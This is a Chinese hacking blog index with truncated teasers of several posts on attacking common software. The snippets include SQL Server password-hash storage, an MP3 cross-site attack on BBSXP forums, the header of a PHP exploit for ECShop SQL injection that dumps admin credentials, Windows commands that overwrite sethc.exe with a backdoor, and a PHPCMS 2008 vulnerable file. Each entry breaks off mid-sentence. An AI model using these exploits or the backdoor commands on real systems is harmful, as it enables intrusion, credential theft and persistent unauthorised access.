神秘小强's bloghttp://www.smxiaoqiang.cn/--------------------------------------SQL服务器是怎样储存密码的？SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发现这个hash储存在mater数据库的sysxlogins表里面。这个可能已经是众所周知的事情了。pwdencry

我们知道，成熟的论坛系统都在用户提交帖子数据的时候对敏感HTML代码进行了转换、过滤或删除，这样就不能嵌入脚本来实现跨站攻击。但恰恰是成熟的论坛都提供提交多媒体信息，也就是可以嵌入MP3音频文件或者FLASH文件，关于FLASH的跨站这里就不说了，今天主要带大家探讨下MP3的跨站攻击。就拿某个版本的BBSXP为例，让管理员或斑竹神不知鬼不觉的帮你删除任何你想删除的帖子（条件是他要看你的帖子）：首先

去年的是2.5的漏洞，今年的也杀2.6，切忌不要乱入侵！只供参考！EXP:#!/usr/bin/php<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.6.2 SQL injection / admin credentials d

鉴于shift后门已经被管理员开始注意，写出本程序，利用的是高对比这个可以远程调用的辅助工具。左Alt+左Shift+PrintScreen(截屏键，一般位于键盘右上) 。设本程序为ade.exe则运行以下命令即可 copy %systemroot%\system32\sethc.exe %systemroot%\system32\sethc.exe.exe copy ade.exe %syste

用squid是利用端口映射的功能，可以将80端口转换一下，其实一般的DDOS攻击可以修改/proc/sys/net/ipv4/tcp_max_syn_backlog里的参数就行了，默认参数一般都很小，设为8000以上，一般的DDOS攻击就可以解决了。如果上升到timeout阶段，可以将/proc/sys/net/ipv4/tcp_fin_timeout设小点。 大家都在讨论DDOS，个人

1  现在的XSS就是跨站脚本攻击一般都是在有服务器交互的情况下在客户端产生的一些问题，那么在没有服务器交互的情况下呢？ 2  另外就是很多人都认为html文件是绝对安全的，那么真的是这样么？什么是HTML injection:    有交互才会产生漏洞，无论交互是怎么进行的，HTML文件并不是像大家想的那样没有任何交互，在HTML文件里还是会用到

PHPCMS从2007到2008，漏洞一直存在。本代码只供参考，不得用于非法用途，站长们请做好防护！受影响程序： phpcms2008 gbk漏洞文件：ask/search_ajax.php code：<?php require './include/common.inc.php';require_once MOD_ROOT.'include/ask.class.php';$ask